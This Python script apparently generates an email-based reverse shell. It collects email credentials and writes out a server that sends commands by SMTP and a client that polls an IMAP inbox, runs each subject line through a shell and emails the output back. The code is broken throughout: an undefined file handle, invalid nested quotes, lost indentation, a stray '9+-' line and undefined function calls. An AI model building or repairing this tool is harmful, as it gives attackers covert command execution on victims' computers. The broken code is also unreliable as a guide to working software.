import random
from datetime import date
import imaplib
import subprocess
import email
import schedule
import time
import pyfiglet


global EMAIL_ADDRESS
global EMAIL_PASSWORD
global contacts
global user
global password


title = pyfiglet.figlet_format("Reverse Shell")
title2 = pyfiglet.figlet_format("via e-mail", font="alphabet")
print(title)
print("\n")
print(title2)

EMAIL_ADDRESSserver= input("[+] Please enter sender email: ")
EMAIL_PASSWORDserver = input("[+] Please enter your sender email password: ")
userclient = input("[+] Please enter password of your receiver email: ")
passwordclient = input("[+] Please enter reciever email password: ")
emailextensionforsender = input("[+] Please enter first email extension: ")
emailextensionforreciever = input("[+] Please enter second email extension: ")




f.write("#SERVER")
f.write("")
f.write("import os")
f.write("import smtplib")
f.write("from email.message import EmailMessage")
f.write("import random")
f.write("from datetime import date")
f.write("import imaplib")
f.write("import subprocess")
f.write("import email")
f.write("import schedule")
f.write("import time")
f.write("import pyfiglet")
f.write("")
f.write("")
f.write("title = pyfiglet.figlet_format("Reverse Shell")")
f.write("title2 = pyfiglet.figlet_format("via e-mail", font="alphabet")")
f.write("print(title)")
f.write("print("\n")")
f.write("print(title2)")
f.write("")
f.write("")
f.write("def readresult(userclient, passwordclient):")
f.write("mb = imaplib.IMAP4_SSL("imap.gmail.com")")
f.write("rv, mesasge = mb.login(userclient, passwordclient)")
f.write("# 'OK', [b'LOGIN completed']")
f.write("rv, num_emails = mb.select('Inbox')")
f.write("# 'OK', [b'22']")
f.write("")
f.write("# Get unread messages")
f.write("rv, messages = mb.search(None, 'UNSEEN')")
f.write("# 'OK', [b'21 22']")
f.write("")
f.write("# Download a message")
f.write("typ, data = mb.fetch(b'1', '(RFC822)')")
f.write("")
f.write("# Parse the email")
f.write("msg = email.message_from_bytes(data[0][1])")
f.write("commandresult = msg['']")
f.write("print(commandresult)")
f.write("")
f.write("def sendcommand(EMAIL_ADDRESSserver, EMAIL_PASSWORDserver, command):")
f.write("msg = EmailMessage()")
f.write("msg['Subject'] = command")
f.write("msg['From'] = EMAIL_ADDRESSserver")
f.write("msg['To'] = userclient")
f.write("msg.add_header('Content-Type','text/html')")
f.write("msg.set_payload("h")")
f.write("")
f.write("with smtplib.SMTP_SSL('smtp.aol.com', 465) as smtp:")
f.write("smtp.login(EMAIL_ADDRESSserver, EMAIL_PASSWORDserver)")
f.write("smtp.send_message(msg)")
f.write("")
f.write("")
f.write("def main():")
f.write("command = path + ">")
f.write("readresult()")
f.write("sendcommand()")
f.write("schedule.every(2).minutes.do(readresult(userclient, passwordclient))")
f.write("while True:")
f.write("schedule.run_pending()")
f.write("time.sleep(1)")
f.write("")
        
        
f.write("#CLIENT")
f.write("")
f.write("")
f.write("import os")
f.write("import smtplib")
f.write("from email.message import EmailMessage")
f.write("import random")
f.write("from datetime import date")
f.write("import imaplib")
f.write("import subprocess")
f.write("import email")
f.write("import schedule")
f.write("import time")
f.write("import pyfiglet")
f.write("")
f.write("")
f.write("")
f.write("def runandsendresult(command, EMAIL_ADDRESSserver, EMAIL_PASSWORDserver):")
f.write("if "run" in command:")
f.write("newcommand = command[4:]")
f.write("print(newcommand)")
f.write("stdoutdata = subprocess.check_output(newcommand, shell=True)")
f.write("print(str(stdoutdata))")
f.write("")
f.write("")
f.write("currentdate = date.today()")
f.write("")
f.write("string1 = "Command Result From" + str(currentdate)")
f.write("")
f.write("msg = EmailMessage()")
f.write("msg['Subject'] = string1")
f.write("msg['From'] = EMAIL_ADDRESSserver")
f.write("msg['To'] = EMAIL_ADDRESSserver")
f.write("msg.add_header('Content-Type','text/html')")
f.write("msg.set_payload(str(stdoutdata))")
f.write("")
f.write("")
f.write("with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:")
f.write("smtp.login(EMAIL_ADDRESSserver, EMAIL_PASSWORDserver)")
f.write("smtp.send_message(msg)")
f.write("else:")
f.write("pass")
f.write("def grabcommand(userclient, passwordclient):")
f.write("mb = imaplib.IMAP4_SSL("imap.aol.com")")
f.write("rv, mesasge = mb.login(userclient, passwordclient)")
f.write("# 'OK', [b'LOGIN completed']")
f.write("rv, num_emails = mb.select('Inbox')")
f.write("# 'OK', [b'22']")
f.write("")
f.write("# Get unread messages")
f.write("rv, messages = mb.search(None, 'UNSEEN')")
f.write("# 'OK', [b'21 22']")
f.write("")
f.write("# Download a message")
f.write("typ, data = mb.fetch(b'1', '(RFC822)')")
f.write("9+-")
f.write("# Parse the email")
f.write("msg = email.message_from_bytes(data[0][1])")
f.write("command = msg['Subject']")
f.write("commandcheck(command)")
f.write("")
f.write("")
f.write("schedule.every(2).minutes.do(grabcommand(userclient, passwordclient))")
f.write("")
f.write("while True:")
f.write("schedule.run_pending()")
f.write("time.sleep(1)")

